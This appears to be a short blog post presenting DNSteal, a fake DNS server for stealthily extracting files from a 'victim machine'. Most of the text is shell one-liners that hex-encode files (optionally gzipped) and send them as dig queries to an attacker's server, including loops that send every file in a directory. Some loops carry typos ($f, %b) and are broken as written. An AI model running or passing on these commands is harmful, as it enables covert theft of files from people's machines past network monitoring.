DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests
This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Below is an image showing an example of how to use:
On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
for filename in $(ls); do for b in $(xxd -p $f); do dig +short @server %b.$filename.com; done; done
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 -z
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done
DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests
Reviewed by Zion3R
on
4:22 PM
Rating: